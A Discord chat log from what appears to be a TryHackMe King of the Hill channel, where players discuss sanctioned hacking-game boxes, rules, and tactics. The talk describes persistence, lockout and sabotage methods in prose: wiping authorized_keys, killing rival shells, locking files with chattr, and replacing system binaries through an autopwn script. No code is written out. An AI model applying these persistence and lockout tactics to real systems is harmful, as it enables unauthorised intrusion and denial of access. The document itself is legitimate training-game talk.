#koth

1 messages ยท Page 18 of 1

steep raptor
#

rEEEEE

void rivet
terse willow
#

Could just go for some oreos right now

steep raptor
#

don't worry i don't Byte...

terse willow
#

Amazingly, they are somehow vegan

steep raptor
#

that's right

void rivet
#

@steep raptor game startd in 3 mins if ur joinin

quiet schooner
#

3min F

#

I'll be late in

void rivet
#

dw

#

im lsow asf

#

and if i aint done the box before

#

then ill be even slower

#

@steep raptor i joining?

#

ninja is in

#

;p

#

imma bout to get slapped by both of u

#

gl

runic river
#

It says people need to be subscribed to play Koth but I see people in public games that are not how is that possible?

rugged pumice
#

๐ŸŸฅ - Get Root, ๐ŸŸฉ - Get King, ๐ŸŸจ - Get in via SSH, ๐ŸŸฆ - Get Shell, ๐ŸŸช - Unknown ??? ?????? ???? ??

๐ŸŸช Space Jam Room

๐ŸŸช Tyler Room

๐ŸŸจ Shrek Room

๐ŸŸจ ๐ŸŸฉ Production Room

๐ŸŸฆ Food Room

my-progress.txt

steep raptor
#

production unknown for me

quiet schooner
#

@rugged pumice Food has changed

lusty portal
#

It says people need to be subscribed to play Koth but I see people in public games that are not how is that possible
@runic river anyone can spectate games , but to play you need to be subscribed.

full grove
#

free to play weekends when ๐Ÿ‘€

runic river
#

No yesterday it let me play 2 koth for free for some reason

lusty portal
#

No yesterday it let me play 2 koth for free for some reason
@runic river that was a bug:)

#

free to play weekends when ๐Ÿ‘€
@full grove rumor has it this weekend.

rugged pumice
#

@quiet schooner changed how :?

full grove
runic river
#

I got so confused on the Tyler room

lusty portal
#

That's the hardest box on koth

#

Shame you got that when playing:)

runic river
#

I guess xd

quiet schooner
#

@rugged pumice I won't say

#

But I fixed some things that were broken

void rivet
#

i i have no idea how to get root

rugged pumice
#

ok

#

who broke the king.txt file ๐Ÿ˜„

void rivet
#

not me lol

#

cant even get ot it

#

xD

#

someone just killed my script or soemshit

#

i was in as root

#

ffs

#

xD

steep raptor
#

not me

void rivet
#

legit just killed my scipr

#

was about to get king

#

xD

#

or try

#

lol

#

script not working now

#

someone either patched it or broke it lol

quiet schooner
#

If it can't read the king, whoever was the last king get the point I think?

void rivet
#

is king.txt broke

#

??

rugged pumice
#

i think so ๐Ÿ˜„

quiet schooner
#

Yep

void rivet
#

ffs

rugged pumice
#

i cant get it ;/

void rivet
#

neither

quiet schooner
#

So I'm stuck as king basically

void rivet
#

yep

rugged pumice
#

is anyone root?

void rivet
#

yh

#

me

#

i just tried

#

to cahnge king

#

but its broke

#

can u delete king.txt and make a enw one??

#

or against rules??

rugged pumice
#

is someone hard spamming it ?

void rivet
#

not me

quiet schooner
#

You can delete and remake but it won't work

void rivet
#

its legit broke

quiet schooner
#

I'm not clearing it

void rivet
#

ninja u are stuck as king

#

xD

quiet schooner
#

Yep

rugged pumice
#

reset bois

#

;d

void rivet
#

everyone reset

#

xD

rugged pumice
#

if it resets, no 1 is getting root ๐Ÿ˜‰

void rivet
#

WHYS THAT ;P

#

caps

rugged pumice
#

๐Ÿ™‚

#

i'll try my best to prevent it

void rivet
#

i have the script ready mate

#

xD

#

im a noob tho

#

i dont even know the command to write in king.txt so i gotts BI it

#

VI

cobalt jackal
#

can we reset?

quiet schooner
#

It's reset

void rivet
#

is it up now

#

or is it turnin back on

steep raptor
#

reset time?

void rivet
#

it ahs reset

cobalt jackal
#

it got reset ye

void rivet
#

is it turnin back on or sopmethin

#

cause i aint gettin any conection

cobalt jackal
#

me neither

void rivet
#

oof

#

u got a connection yet??

rugged pumice
#

yikes ;/

void rivet
#

@rugged pumice is it off for u to?

rugged pumice
#

i cant ssh, well, its asking for a pass ;/

void rivet
#

inot even asking me for a pass

#

cant even ftp

rugged pumice
#

i can

void rivet
#

i cant ๐Ÿ˜ฆ

#

might have to reset my VM

rugged pumice
#

reset the room again ;/

void rivet
#

yh

quiet schooner
#

You only get one reset IIRC?

#

Or that got fixed

cobalt jackal
#

yeha I got it

void rivet
#

im restarting my vm

#

this is a big oof

#

whoever broke king

#

grrr

quiet schooner
#

@void rivet It's not broken

void rivet
#

yh ik

#

i meant before

#

askin me for password

cobalt jackal
#

password is NOT password

slim mist
#

what if it is

steep raptor
#

no idea

void rivet
#

legit askin me for a password

rugged pumice
#

why is ssh asking for password when I have the id_rsa ;/

void rivet
#

i chmod the id_rsa

#

same

rugged pumice
#

truu

terse willow
#

Chances are

#

Someone deleted the authorized_keys file

#

on the server

void rivet
#

ooooooof

#

playin dirty

terse willow
#

Nah, all part of the game

rugged pumice
#

no way ninja got in that fast ;/

terse willow
#

The trick is maintaining persistence

void rivet
#

yh, i wouldbve got in if i didnt have to reset my vm

terse willow
#

Especially in a way that no one expects, because otherwise they can counter it

#

Remember that root is God. Unless you can pull someone away from being root, that's you done for

void rivet
#

@rugged pumice looks like were locked out xD

#

gg

rugged pumice
#

if you have a reverse_shell in the machine and reset it, do it delete the reverse_shell?

#

yea :d

void rivet
quiet schooner
#

Yes

#

Passwords were changed, keys were revoked

void rivet
#

big f for me

#

Ninja

#

u

#

saucy

#

mofo

rugged pumice
#

ninja how did you get in so fast after the reset lol

void rivet
#

lucky i had to reset my VM xD

#

was fun tho

#

gg guys

#

am still gonna come 3rd ;/

#

guess thats good

quiet schooner
#

@rugged pumice Keys

#

Then I wiped them from the box and changed passwords

void rivet
#

ur saucy

#

i was gonna do the same thing

#

xD

rugged pumice
#

i don't even know how to do that lol ;ddd

quiet schooner
#

Fastest root in the west

void rivet
#

Legit had my script at the ready but had to reset my VM

rugged pumice
#

so far , I have not been able to get root on any machine

void rivet
#

think ive rooted this and shrek befrore

#

thats it

#

i like shrek

#

whoever made that

quiet schooner
#

@rugged pumice You can root Food without too much trouble

#

Shrek is a good box

void rivet
#

yh

#

my freidn was guessing the password for 30mins

#

i got it in 5min

#

kinda a giveaway

rugged pumice
#

@quiet schooner I just found a way to get shell on Food, but didn't have time to try other things ;d

steep raptor
#

REEEallly

#

that's the pw

#

@quiet schooner

#

NICE

quiet schooner
#

@steep raptor lmao

void rivet
#

ati mean

#

atleast i got 3rd

#

and am a big noob

#

;p

quiet schooner
#

@steep raptor Yep, that's the one I used yesterday too

rugged pumice
#

ninja, is the pass for ssh brute-forcable ?

steep raptor
#

maybe

#

i just cracked that hashes of it all

#

REEEEE

quiet schooner
#

@steep raptor Have fun

#

@steep raptor Not any more btw

rugged pumice
#

๐Ÿ˜ weirdChamp

void rivet
#

oooof

#

Oreo

#

takin king

#

go on lad

quiet schooner
#

@steep raptor DM me, I have a question

rugged pumice
#

yea, friend you ninja ๐Ÿ˜›

void rivet
#

ninjas question is how did u get king

#

xD

steep raptor
#

rush king and locked us out

quiet schooner
#

No it's a serious question

steep raptor
#

lol

void rivet
#

lol

steep raptor
#

join KOTH-1 would love to hear what you have to say

dapper escarp
#

aye good news everybody, my autopwn script broke somehow

#

๐Ÿ˜‚

void rivet
#

good

dapper escarp
#

good thing I'm too lazy to fix it

#

I haven't ever used it lmao

void rivet
#

haha

dapper escarp
#

I made it in a private game for fun

void rivet
#

yh

dapper escarp
#

Find it ruins the fun if you just auto pwn to root

void rivet
#

what so u ran the script and u got king??

#

thats just mad

dapper escarp
#

yeah the script for shrek would do the following

Gain persistence and harden Donkey while providing a callback as root. Was aiming to get it so that it would generate root ssh keys and overwrite /etc/ssh/sshd_config to allow root sign in  
void rivet
#

thats just OP

dapper escarp
#

But yeah given up on that now as it was fun but ruined it completely

void rivet
#

yh

#

whenever i see u or dan in a lobby i just leave xD

#

cause no point me bein there

dapper escarp
#

Had it as a two part script in which I run one and it pulls my harden script which then removes sudoers, replaces ls, cat, echo and sudo with terminal parrot. Plants terminal parrot within users $PATH and then adds it to their bashrc

quiet schooner
#

I need to get terminal parrot

dapper escarp
#

Tbh I only know shrek and space jam

void rivet
#

i like shrek

dapper escarp
#

I've done food once and did alright but never took any notes, production and tyler I've only had once

#

can't get root on tyler

void rivet
#

@lusty portal can u add the titles to the boxes so we can see which one it is

#

@dapper escarp think ive only got root on food and shrek

#

im kinda new to all this

#

so im kinda slow

dapper escarp
#

Tyler is another level of weird

void rivet
#

havent tried it

quiet schooner
#

I won tyler with a single flag

#

I know people that got a shell

#

I did not

dapper escarp
#

I gained user shell on two users, but the priv esc was just not having any of it

#

managed to get an autopwn for both but they're pretty useless

void rivet
dapper escarp
#

how long till start?

quiet schooner
#

12min

neon sleet
#

Damn I just joined by accident

#

ignore me

#

I wanted to spectate

#

@void rivet

void rivet
#

@neon sleet ???

#

i gave up ages ago

#

never done tyler and i couldnt get it working

neon sleet
#

I just clicked the link

void rivet
#

oh lol

neon sleet
#

and it auto-joined me

void rivet
#

ooooffff

fair adder
#

gg wp

steep raptor
#

gg

neon sleet
#

@void rivet I submitted a flag, I saw there was a few minutes left so figured I'd see what I'd find ๐Ÿคฃ

void rivet
#

XD

neon sleet
#

I really want to do that room though

#

Seems like a lot of fun, but I need some time for sure.

void rivet
#

im new to all this so i only just learned how to make a php shell to a jpg

#

im a newb

dapper escarp
#

Man kudos to you

neon sleet
#

Yeah that's actually pretty impressive!

dapper escarp
#

takes some doing jumping into a koth style game mode and using it to learn

void rivet
#

yh man

#

i came 3rd the game before

#

out of 5 or 6

#

was completely out of my depth on this one though

fair adder
#

the privesc on that box is tough

#

or at least wasnt obvious

#

if one of the other holes are patched

neon sleet
#

I've heard about it, didn't experience it yet.

rugged pumice
#

@dapper escarp @weary kindle can I pm you?

quiet schooner
#

๐Ÿ‘€

dapper escarp
#

Go nuts

void rivet
#

@dapper escarp do u recommend i do the rooms

#

and learn abit

#

and then come back to KOTH?

rugged pumice
#

yes!
i've done a whole learning path and i'm still struggling ;/ ;d

#

there is a lot to learn

void rivet
#

im not doing that bad tbh

rugged pumice
#

truuu

void rivet
#

i mean i got root on the other one we did

#

idk the name of it

dapper escarp
#

It's not a bad idea tbh, the worst case scenario is you learn something

void rivet
#

true

dapper escarp
#

win win in my opinion

void rivet
#

i like to go against people that are either at same level as me or just a bit beter

dapper escarp
#

Hopefuly there will be a ranked system for it eventually at some point

void rivet
#

cause if i go against someone like u just takes the motivation out of me cause ik i wont win lol

dapper escarp
#

if it picks up a bit of speed

void rivet
#

ur acc insane

#

i watched ur stream

dapper escarp
#

aha I wish, I have a long way to go and also have the issue of now people expect me to perform ๐Ÿ˜‚

void rivet
#

true xD

#

to me ur insane

#

cause im still new

dapper escarp
#

You'll ge tthere man, I have no doubt you'll be over taking me in no time!

#

You're certainly in the right place

#

I think I may make a couple of youtube videos once this set retires properly on my strategies once I got into the box to harden it

void rivet
#

yh man, thanks, imma start going through the rooms tomorrow

quiet schooner
#

No more tyler

dapper escarp
#

Tyler is a sick box

#

if all koth boxes were like that

#

I'd lose every game

rugged pumice
#

what's wrong with tyler ;/

quiet schooner
#

It's hard

rugged pumice
#

opsss, can;t give hints

dapper escarp
#

Yeah Tyler is that nice kind of brutal in which everyone has a chance

#

until one person cracks it I feel

quiet schooner
#

@rugged pumice If you rooted it, you're doing better than everyone else

dapper escarp
#

^^^^

rugged pumice
#

no way lol

#

are you doing it rn?

quiet schooner
#

For the third time in a row

dapper escarp
#

Think I might do a couple of privates tomorrow and try fiddle with tyler

rugged pumice
#

send invite lol

#

it takes 5 mins max

dapper escarp
#

I seem to just keep getting shrek

#

it's cursed

#

It's like karma for making my script/one liners

quiet schooner
#

@dapper escarp We got root baby

dapper escarp
#

ayeee

#

please tell me it wasn't with the vim binary

quiet schooner
#

Nope

dapper escarp
#

hmm I gotta look at that box

#

It's the only box I use my autopwn on and that's only to jump into user shells

#

note I don't submit flags when I use them

#

You may see me in public games with 0 points as I work on finding alternative methods into boxes

rugged pumice
#

ninja can't join because it's already running, so i'm being put into other rooms

quiet schooner
#

Prod was a really fun box

#

@fair adder might have got blood on root on Tyler

dapper escarp
#

I think Dan rooted it last time I played with him

#

but kudos that box wassomething else

fair adder
#

geeeeow

#

was not easy

rugged pumice
#

did you brute-force your way in? ;d

fair adder
#

erm

#

at the risk of spoilers ill have to defer my question :P

dapper escarp
#

f

fair adder
#

although im happy to give gentle pushes in the right direction

#

if that's allowed

#

there's multiple ways to skin this cat

rugged pumice
#

๐Ÿ˜‰ ๐Ÿ”จ ๐Ÿ”€ ๐Ÿงฐ

fair adder
dapper escarp
#

slam face into keyboard == root

fair adder
#

you DIDNT get root like that @dapper escarp

#

????

rugged pumice
#

๐Ÿ‘Œ โ›ˆ๏ธ ๐ŸŒช๏ธ ๐Ÿ”ฅ โ–ถ๏ธ accessgranted

dapper escarp
#

I haven't rooted tyler

#

so that method is flawed

#

keyboard != root

fair adder
#

faceroll keyboard == root

#

trust

dapper escarp
#

brb just gunna brute force a root pw

fair adder
#

i meannnnnnnnnnnnnnnnnnn

weary kindle
#

I have rooted Tyler, got it on my first game. I agree with optional, really good box

fair adder
#

i thought it was great as well

nova prawn
cobalt jackal
#

@pale mango here

distant zealot
#

i comming ๐Ÿ™‚

#

my network is laggy

pale mango
#

Vir sec con ctf @cobalt jackal

distant zealot
#

@nova prawn i don't have Mic ๐Ÿ˜„

nova prawn
#

ah ok xd

distant zealot
#

@steep raptor Hi , No mic

jolly parcel
nova tide
#

anyone who streams koth time to time except 0ptional?

glossy vessel
#

Sherlock Sec

weary kindle
#

yep ๐Ÿ™‚

#

I'm sure there's more, check the TryHackMe section on twitch from time to time

glossy vessel
void rivet
#

Morning bois

void rivet
#

Anyone up for a koth?

#

@lusty portal can u make it so we can see what box we are going to be doing while it's counting down?

lusty portal
#

Its chosen 1 minute before starting

void rivet
#

Ahh ok

lusty portal
#

I can make it show once the game has started?

void rivet
#

Yh

#

Please

distant zealot
#

im ready ๐Ÿ™‚

void rivet
#

Alright I'm just gonna get out of bed and throw some water on my face ๐Ÿ˜‚๐Ÿ˜‚

distant zealot
#

hahaa ๐Ÿ™‚

gusty cradle
#

@void rivet Can I join as well?

distant zealot
#

@gusty cradle where ?

gusty cradle
#

He has not sent the link yet

void rivet
#

Yh sure

distant zealot
#

he wants go to sleep

void rivet
#

No I just woke up

#

Aha

distant zealot
#

oh good ๐Ÿ™‚

void rivet
#

Judt going to grt in thr shower and il be ready

distant zealot
#

private room ?

gusty cradle
#

Probably public

void rivet
#

Do points earned on koth go onto ur points on ur account?

gusty cradle
#

No

void rivet
#

Alright

distant zealot
#

Ready guys ?

gusty cradle
#

I'm ready

void rivet
#

Almost

#

Went to bed at 5am

#

So got up late today

#

Turning pc on now

#

bootin up vm

#

anyone else joining VC??

jolly parcel
#

I can join

void rivet
#

yh ok

gusty cradle
#

I hope we get Shrek

void rivet
#

lol

#

i dont

#

cause i only know 1 way to get the file i need

#

and i dont have that setup now

gusty cradle
#

Start the match and post the invite link here

void rivet
#

bout to now

#

i want a box i havent done before

#

no point doing the same box over ad over again

lusty portal
#

Its random ^

#

2 more boxes incoming next week

void rivet
#

yesssss

#

Skidy u wanna join in on this ? ;p

lusty portal
#

Skidy u wanna join in on this ? ;p
@void rivet Fixing Path loading speed atm

#

So will pass

#

I will play on the new boxes mind

void rivet
#

alright

stable narwhal
#

I will play on the new boxes mind
@lusty portal Skiddy playing! what?

void rivet
#

glhf

#

my vpn is fuckin up oof

#

imma be a bit late there lol

distant zealot
#

my subscribe dead today Hahaa

void rivet
#

ooof

#

resarrting my vm

#

inconvenience

rugged pumice
#

very cheeky

void rivet
#

did someone break the ssh??

#

big f

#

why does my vpn always fuck up so im always late xD

gusty cradle
#

Yeah, someone broke ssh

void rivet
#

ooof

rugged pumice
#

tarasz 100%

void rivet
#

looks like me and u are locket out

#

yh

rugged pumice
#

me 2

gusty cradle
#

@jolly parcel Dude, stop it! You're spamming ssh

void rivet
#

reset box xD

rugged pumice
#

he wont

#

but i have alt 1 sec ๐Ÿ˜„

void rivet
#

oh shit yh

#

haha

rugged pumice
#

ohh ;d

jolly parcel
#

sorry, ran by mistake all scripts from file

gusty cradle
#

Don't do it again

void rivet
#

can anyone connect yet??

#

everytime the box resets i have to restart my vm cause i get no connection

rugged pumice
#

;/ again

void rivet
#

again what??

rugged pumice
#

you have to restart your vm

void rivet
#

yh

#

its annoying

#

still cant connect

#

grrrr

rugged pumice
#

the box is very low, and it disconnected me

#

who is spamming scripts lol

void rivet
#

tara i bet lol

#

just says connection timed out for me

#

cant connect

#

ooof

jolly parcel
#

box is ok

#

what is not working?

void rivet
#

my connection is fucked

#

re-gend a new vpn

#

restarted vpn

#

not working

#

big f for me

#

anyone else doing a box rn

#

send me an inv

rugged pumice
#

hard f, tarasz locked it down i think ;d

void rivet
#

i never got a chanvce to get in

#

cause i couldnt connect

#

tarasz have u got an auto script??

jolly parcel
#

just checked again, initial path to get to root works okay

#

or maybe no ๐Ÿ™‚

rugged pumice
#

did you ran some kind of script cuz when i got it, it was very laggy ;/

jolly parcel
#

dude, I am playing this second day, I haven't got a time to create some auto scripts

#

for machine

#

just a few to get persistence

#

did you ran some kind of script cuz when i got it, it was very laggy ;/
@rugged pumice nothing besides cronjobs

rugged pumice
#
        • ?
jolly parcel
#

I am still new here, so maybe I missed some rules. It is allowed to patch found vulnerabilities, right?

#
        • ?
          @rugged pumice yeah, 1 cronjob
rugged pumice
#

the box is so laggy ๐Ÿ˜„

gusty cradle
#

Why does it return segfault

void rivet
#

i shutdown my vm completely

#

regend my vpn

#

cant connect

#

think the box just dont like me rn

rugged pumice
#

cpu 100%, ram 100%, disk 100% ๐Ÿ˜„

void rivet
#

jeeeez

#

whos doin that??

rugged pumice
#

i has to be 1 or 2 of the above

#

because even the web server can;t load

#

so something is draining resources

void rivet
#

i cant connect to ftp or ssh

rugged pumice
#

tru, it hangs ;d

#

1 more restart :?

jolly parcel
#

where do you see cpu 100%???

gusty cradle
#

Don't restart

rugged pumice
#

no i'm not seeing it, but there has to be something running at 100%

#

nothing load

#

it just hangs

jolly parcel
#

i will l not restart, sorry, i checked all ports and it works okay

void rivet
#

if u didnt flood the ssh first we wouldnt have had to restart in the first place ;p

jolly parcel
#

is ssh flood disallowed in rules? I can't see it

void rivet
#

no

#

well im not sure

#

just a point

rugged pumice
#

isn't flooding == dos :?

void rivet
#

O_o

jolly parcel
#

well, okay, maybe. I ran it by mistake in a loop. now i don't

#

I can confirm that machine is rootable now as I didn't patched all services. I am not sure If it is allowed

rugged pumice
#

you sure you stopped it ;/

#

it is allowed to patch

gusty cradle
#

Use ftp

#

Telnet sucks

jolly parcel
#

there are multiple ways to root this box

rugged pumice
#

no im testing if the service is running

jolly parcel
#

telnet wasn't working for me from the start, idk what's the problem

rugged pumice
#

i'm not using telnet to connect, just to test if the service is running

jolly parcel
#

who is 10.11.0.11 ?

gusty cradle
#

Me, why?

#

Stop killing my shell

rugged pumice
jolly parcel
#

I believe, it is allowed

Stop killing my shell
@gusty cradle

gusty cradle
#

๐Ÿ˜

#

I already have another shell

rugged pumice
#

๐Ÿ˜ฎ

dapper escarp
#

You would be correct. Shell killing is 100% allowed

jolly parcel
#

i will switch now to another game so you have a chance to get root:)

void rivet
#

vpn isnt working again

#

why tf

#

worked yesterday fine

rugged pumice
#

i've never played this 1 ๐Ÿ˜ฎ

jolly parcel
#

me too

void rivet
#

what one is it

rugged pumice
#

michael jordan :?

void rivet
#

ah

gusty cradle
#

me three

void rivet
#

ive seen this one

#

never done it though

#

how u get king that quick?

#

u done this before?

rugged pumice
#

weirdChamp ;d

#

no way its that easy

jolly parcel
#

lol it was easy ๐Ÿ™‚

#

keep trying, I will patch it soon

void rivet
#

legit have no idea with this one

rugged pumice
#

@weary kindle can i pm you?

weary kindle
#

What's broke on prod now

#

Yeah sure, shoot away

void rivet
#

no idea how to do this one

gusty cradle
#

Is it supposed to return segfault?

jolly parcel
#

what returns segfault?

gusty cradle
#

I'll pm you

void rivet
#

@jolly parcel have u patched it yet??

#

or cna i just not find it lol

jolly parcel
#

there are few ways to get in

#

some are patched by now

rugged pumice
#

few ways :D
i can't even find 1 ;ddd

void rivet
#

can u brute force password for ssh?

gusty cradle
#

@jolly parcel Good game, guess I'll have to settle for second position

void rivet
#

i got so happy when i found a /flag/ extension

#

but notrhin is there

#

tara

#

i checked a port

#

and found ur name

#

;p

jolly parcel
#

oops

void rivet
#

hehe

#

so u patched that port yh??

#

im guessing it had somethin on it

#

like a password or somethin

#

u just kicked me out xD

#

@rugged pumice hes patched it all

jolly parcel
#

I believe, rules page is to small. If patching is allowed what is considered as patching? rotating keys, removing functionality, stopping services. There are no clear description what services should work and how

void rivet
#

nah man its all allowed i belive

#

just letting him know u have patched all of them

gusty cradle
#

Not everything is allowed

void rivet
#

rlly??

terse willow
#

You're not allowed to attack other people

#

You're not allowed to delete flags

void rivet
#

oh yh obvs

gusty cradle
#

You can not use iptables to block all connections except yours

terse willow
#

In terms of patching stuff, you're not allowed to just blanket restrict everything ^^

#

Port 9999 must stay up

gusty cradle
#

I wanted to do that so badly ๐Ÿ˜ข

terse willow
#

But other than that, enjoy

jolly parcel
#

so I can just stop all other services? rly?

gusty cradle
#

So can we delete things that are needed for foothold?

terse willow
#

Yeah, that may or may not have been my suggestion when Koth was suggested. Hence it being banned

#

I believe so, yes

#

That's just good patching

gusty cradle
#

๐Ÿ‘€ I'll block ssh next time

terse willow
#

It's why there are so many footholds -- to make it unlikely that you can patch them all

jolly parcel
#

lol

terse willow
#

Just remember that if you turn off all services, you're gonna kill your own connection too

#

Gotta be smart about it

gusty cradle
#

Nah, I'll upload my keys to authorized_keys modify ssh service and boom

jolly parcel
#

but nothing stops me from allowing ssh only for root with my key

terse willow
#

Modify? That'd do it (unless someone else is already in and overwrites your key before you finish modifying)

#

Probably best to setup more persistence than that, but yes

gusty cradle
#

I have a script that enters my name into king.txt every minute

terse willow
#

Every minute? Try 100 times a second ๐Ÿคฃ

void rivet
#

xD

gusty cradle
#

๐Ÿ˜„

terse willow
#

I have a lovely one liner to constantly do that, whilst simultaneously keeping anyone else from modifying the file at all

gusty cradle
#

chattr?

#

I use chattr on my script

jolly parcel
#

so technically ssh flood is allowed? that's just the same as turning off ssh

terse willow
#

Yeah, but more complicated than that

rugged pumice
#

@void rivet are services slow for you?

void rivet
#

yh

terse willow
#

Just using chattr is easy for everyone to use

gusty cradle
#

Not everyone is familiar with chattr and it's easy to reverse

rugged pumice
#

i feel like every box that tar is in becomes very slow

#

๐Ÿ˜„

terse willow
#

Precisely

void rivet
#

yep

#

xD

gusty cradle
#

Is SSH flooding allowed?

terse willow
#

With the oneliner I've got up my sleeve? It's significantly harder to reverse...

rugged pumice
#

flooding == dos, i hope 'not'

gusty cradle
#

@terse willow Me want!

#

I'm gonna go create that

terse willow
#

Is SSH flooding allowed?
@gusty cradle I would imagine not, to be honest, just in case you DOS the thing

gusty cradle
#

How about spamming others users input?

rigid raptor
#

I mean, JH did do that during the stream

terse willow
#

That one is allowed ๐Ÿ˜

#

Absolute pain in the rear end

rigid raptor
#

nasty nasty, but the good kind

gusty cradle
#

Oh, yes! Now to find a binary file to spam

rigid raptor
#

/*

terse willow
#

I've almost got a script to do that which will be unbeatable, and leave me a nice loophole to never affect myself

#

Just doesn't quite work yet ๐Ÿ˜†

rigid raptor
#

does it filter out the input, or does it not send to yourself?

rugged pumice
#

what is the actual room name that has port 80 -> Michael Jordan

gusty cradle
#

Spacejam

rigid raptor
#

probably space jam

rugged pumice
terse willow
#

It sends it to any tty owned by a connection from an IP that isn't my own @rigid raptor

void rivet
#

it is spacejam

gusty cradle
#

So if we somehow spoof your ip?

rigid raptor
#

Right, so avoiding. I was wondering if you were being clever somehow. Probably best to keep it simple

terse willow
#

Good luck with that -- the VPN will throw a fit, but yeah, theoretically

#

๐Ÿ˜† exactly

rigid raptor
#

spoofing ips work better if you've got control of something between the two endpoints. And since you're not allowed to attack the other players, that's going to be difficult

terse willow
#

^^

rigid raptor
#

I mean, it would be pretty fun to have a router or switch in the loop

terse willow
#

Only easy way to do it would be by nicking my config file, which a) ain't allowed, b) would be very difficult and c) would throw the VPN into a hissy fit

rigid raptor
#

yeah, cause two connected at the same time

#

@terse willow Can I PM you? I think I got a nasty defence tactic in mind, but I'm not sure if it's a little too nasty. But if it isn't, I'd rather not give it away just yet :p

gusty cradle
#

@terse willow Are we allowed to create fake flags to confuse people?

rigid raptor
#

lmao

gusty cradle
#

๐Ÿ˜†

terse willow
#

@rigid raptor go for it

#

@gusty cradle I've heard that before. No reason why not!

gusty cradle
#

I'm gonna go create a fake flag generator ๐Ÿ˜

#

Thank god I saved some flags!

#

I'm gonna create fake ones based on that

rigid raptor
#

@lusty portal Can I PM you? Muri asked me to divert a rule decision to you. It's regarding an idea to keep other players out once you get in, but we can't decide if it's a bit too evil :p

gusty cradle
#

๐Ÿ‘€

lusty portal
#

@lusty portal Can I PM you? Muri asked me to divert a rule decision to you. It's regarding an idea to keep other players out once you get in, but we can't decide if it's a bit too evil :p
@rigid raptor yeah sure

void rivet
#

@gusty cradle please dont use ur flag gen on me rn xD

rigid raptor
#

@gusty cradle do it

gusty cradle
#

No promises ๐Ÿ˜†

void rivet
#

noooooo

#

have u made it??

gusty cradle
#

๐Ÿ˜

void rivet
#

xD

#

RIP me

#

my vpn broke again

#

lol

#

this is weird

#

u got a 4 min headstart now

#

why does this always happen xD

terse willow
#

Keep it PG13 @void rivet ๐Ÿ™‚

void rivet
#

ah sorry

#

my reverse shell isnt working big ooof

rigid raptor
#

"oof" shouldn't be allowed in PG13, i swear

gusty cradle
#

We got tyler ๐Ÿ˜ข

void rivet
#

its annoying as

#

hell

rigid raptor
#

as annoying as hall

void rivet
#

@gusty cradle we are not having any luck are we

gusty cradle
#

I got some creds

void rivet
#

F for me

gusty cradle
#

Got shell

rigid raptor
#

Got Milk?

void rivet
#

im trying but it aint workin for me lol

jolly parcel
#

i am joining

void rivet
#

no

#

dont

#

every box ur on runs slow

lusty portal
#

KoTH machines shouldn't run slow?

void rivet
#

they did earlier

lusty portal
#

If a specific machine does run slow, I can bump its resources.

#

Which machine?

void rivet
#

there was 2

gusty cradle
#

Tyler

void rivet
#

one was food

#

idk the other one

lusty portal
#

If anyone else reports this I will bump the resources

void rivet
#

666 had the same issue aswell

#

@rugged pumice

#

with the same boxes

jolly parcel
#

for me it worked ok, don't know what was the problem for you

void rivet
#

was slow for all of us except u

#

O_o

lusty portal
#

You guys using the IP VPN too?

void rivet
#

yh

#

using everything we need to

gusty cradle
#

How many flags are there on Tyler?

void rivet
#

my shell doesnt wanna work for some reason lol

lusty portal
#

you can hover over the flag icon and it tells you

#

On the flag submission box

void rivet
#

theres 6

#

ive heard tyler is quite hard

lusty portal
#

Its the hardest KoTH box

void rivet
#

especially when it doesnt work with my shell lol

#

ah

#

makes sense now

vagrant imp
#

hey guys any tryhackme mod/support than can answer a question about the new koth stuff?

quiet schooner
#

I mean probably

vagrant imp
#

@quiet schooner can i dm u

quiet schooner
#

I mean I would argue you shouldn't need to

#

But I guess you can

void rivet
#

tyler is hard

#

jeez

#

i legit give up

#

xD

lusty portal
#

Ill give you a hint

#

Which part are you on?

void rivet
#

nahhh i dont want a hint aha

lusty portal
#

Okie:)

void rivet
#

wanna find it myself otherwise feel like ive cheated

#

ik how to get it

#

but my shell isnt working

quiet schooner
#

I have root but not user

gusty cradle
#

@quiet schooner Same

#

I can't find anything

quiet schooner
#

no spoilers

void rivet
#

ohh sorry

gusty cradle
#

Maybe

void rivet
#

yh mine aint working ive done something wrong

gusty cradle
#

@quiet schooner I think it's a container or something

void rivet
#

is it like a docker?

gusty cradle
#

Can't say

void rivet
#

ahhh ok

#

well....8mins left

#

imma go and get a drink

#

then do another box

#

xD

gusty cradle
#

Whoever made Tyler is very evil ๐Ÿ˜ข I have root but I can't find user

weary kindle
#

Ohhhh

#

I know what you've done

#

hehehe

quiet schooner
#

Also prod was really nice

#

Thanks Dan

weary kindle
#

|| You've been honeypotted, you don't have root. || Spoiler, but it's worth it for your sanity

#

np

gusty cradle
#

Noooooooooooooooooo!

quiet schooner
#

I do actually have root tho

weary kindle
#

Right, I'm gonna hop into my VM and play a few games

dapper escarp
#

@weary kindle hit that stream up

weary kindle
#

effort tho

stable narwhal
#

Always fun watching you guys stream

weary kindle
#

couldn't be bothered to wait 20 minutes

void rivet
#

@lusty portal are we able to leave when it has already started

#

??

lusty portal
#

nope

void rivet
#

oooof

#

ok

distant zealot
#

how we can see stream ? @stable narwhal

mellow bough
#

Oh Dan is sharing his screen

#

Optional and myself will also be streaming throughout the day, just we're on twitch typically

turbid plaza
stable narwhal
#

@distant zealot, follow optional or Sherlock on Twitch

mellow bough
#

Just gonna leave me out there? ;P @stable narwhal

stable narwhal
#

Soz @mellow bough ๐Ÿ˜ข didn't mean to haha

mellow bough
#

haha all good

stable narwhal
#

Follow DarkStar/TryHackMe on Twitch too ๐Ÿ˜‰

brazen cloud
#

but all of the above first

dapper escarp
#

Follow dark for tutorials on how to be defeated by an almighty zip file

#

As seen on agent sudo last night

stable narwhal
#

optional, are you still streaming UoP stuff today?

dapper escarp
#

Sorry man, something came up today so wonโ€™t be able to

rugged pumice
#

@mellow bough guilty!

mellow bough
#

all good, Dan shot me a DM about it

#

Just don't do it again, kay?

lusty portal
#

Are 'myalt' or 'stivanradev' in the Discord?

rugged pumice
#

both are me

lusty portal
#

Oh right, out of interest why lol?

#

You have (and are paying for) 2 accounts

rugged pumice
#

KOTH requires 2 players in lobby.
so having 2 accounts allows me to play privately
without rushing for points,etc

also I can test my blue skills

lusty portal
#

Oh right, ok:)

#

How did you hear about THM?

rugged pumice
#

ohh
JohnHammond made a youtube video about it

gusty cradle
mellow bough
#

Oh no, we're still in beta. This is a public release of the beta, the rules/game is still subject to some change

gusty cradle
#

Oh, okay, what about the second part? Pretty much anyone that's subscribed can create a game

mellow bough
#

Oh the only restriction is that it won't let you join depending on the experience level you have selected on your profile I think

gusty cradle
#

Thank you for telling me, by the way you guys have a great platform, and the community here is really friendly, keep up the good work!

